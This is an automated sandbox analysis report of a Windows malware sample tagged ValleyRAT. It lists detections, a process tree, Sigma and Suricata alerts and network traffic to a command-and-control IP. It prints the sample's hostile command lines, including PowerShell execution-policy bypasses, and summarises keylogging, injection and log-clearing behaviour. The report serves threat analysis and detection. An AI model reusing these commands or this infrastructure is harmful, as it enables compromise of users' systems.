Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OdiHmn3pRK.exe

Overview

General Information

Sample name:OdiHmn3pRK.exe
renamed because original name is a hash value
Original sample name:11933d4b44331258739282e769ca4914.exe
Analysis ID:1581339
MD5:11933d4b44331258739282e769ca4914
SHA1:dbd80d352bb11812af26421bd0668d2913e93eac
SHA256:ed319509508b44b3dd2a50c735c11c2bb7d29b753435b28ab40e3d08d376e46a
Tags:exeValleyRATuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Found evasive API chain (may stop execution after checking mutex)
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • OdiHmn3pRK.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\OdiHmn3pRK.exe" MD5: 11933D4B44331258739282E769CA4914)
    • cmd.exe (PID: 7552 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • kwpswnsserver.exe (PID: 7600 cmdline: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe MD5: 607336E586D1BD00DCF1CA7EED97A8DB)
        • cmd.exe (PID: 8168 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7232 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7236 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5820 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7700 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 7648 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 5576 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 932 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2088 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7824 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7944 cmdline: tasklist /FI "IMAGENAME eq kwpswnsserver.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6356 cmdline: findstr /I "kwpswnsserver.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 6620 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 3496 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3020 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 1596 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2200 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Execution from Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, CommandLine: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ProcessId: 7600, ProcessName: kwpswnsserver.exe
Sigma detected: Parent in Public Folder Suspicious Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentImage: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, ParentProcessId: 7600, ParentProcessName: kwpswnsserver.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 3496, ProcessName: cmd.exe
Sigma detected: Suspicious Program Location with Network Connections
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 118.107.44.219, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exe, Initiated: true, ProcessId: 7600, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49786
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 3020, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 3020, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T13:10:23.432699+010020528751A Network Trojan was detected192.168.2.449795118.107.44.21919091TCP
2024-12-27T13:11:34.693883+010020528751A Network Trojan was detected192.168.2.449803118.107.44.21919091TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Bilite\Axialis\Microsoft.WindowsAppRuntime.Bootstrap.dllReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\backup.dllReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: OdiHmn3pRK.exeVirustotal: Detection: 28%Perma Link
Source: OdiHmn3pRK.exeReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_004A39C0 CryptStringToBinaryA,CryptStringToBinaryA,Concurrency::cancel_current_task,CryptBinaryToStringA,CryptBinaryToStringA,Concurrency::cancel_current_task,ShellExecuteExW,3_2_004A39C0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8600A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,3_2_6C8600A0
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C861100 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptSetKeyParam,CryptDestroyKey,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,CryptDestroyKey,CryptReleaseContext,3_2_6C861100
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C85FDE0 CryptStringToBinaryA,CryptStringToBinaryA,3_2_6C85FDE0

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeUnpacked PE file: 3.2.kwpswnsserver.exe.4270000.6.unpack
Source: OdiHmn3pRK.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdby source: powershell.exe, 00000012.00000002.2580579399.0000000002DA1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2580579399.0000000002D51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb2 source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \YSS\Release\Microsoft.WindowsAppRuntime.Bootstrap.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2584651859.000000000738E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\workspace\gitlab\wns\kwpswnsserver\bin\release\kwpswnsserver.pdb source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000000.1759768891.00000000004D1000.00000002.00000001.01000000.00000005.sdmp, kwpswnsserver.exe, 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2589252311.00000000084EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2589479854.000000000850F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\jenkins_agent\workspace\windows_desktop_new_installer_build\line-updater\LineInstaller\bin\LineInstaller.pdbI source: OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: z:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: x:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: v:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: t:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: r:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: p:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: n:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: l:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: j:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: h:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: f:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: b:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: y:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: w:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: u:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: s:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: q:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: o:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: m:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: k:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: i:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: g:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeFile opened: [:Jump to behavior
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\OdiHmn3pRK.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C8C816F __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C8C816F
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9DF0FC FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C9DF0FC
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_6C9DF04B FindFirstFileExW,3_2_6C9DF04B
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_042780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_042780F0

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49795 -> 118.107.44.219:19091
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49803 -> 118.107.44.219:19091
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 118.107.44.219 ports 18852,19091,1,2,5,8
Source: global trafficTCP traffic: 192.168.2.4:49786 -> 118.107.44.219:18852
Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknownTCP traffic detected without corresponding DNS query: 118.107.44.219
Source: C:\Users\Public\Bilite\Axialis\kwpswnsserver.exeCode function: 3_2_04273360 recv,timeGetTime,_memmove,3_2_04273360
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.2582173595.00000000027F2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2580579399.0000000002DA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000012.00000002.2584243863.0000000007329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, kwpswnsserver.exe, 00000003.00000003.2462249192.0000000001557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757550289.0000000002523000.00000004.00001000.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1756036351.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, OdiHmn3pRK.exe, 00000000.00000003.1757359859.0000000000730000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
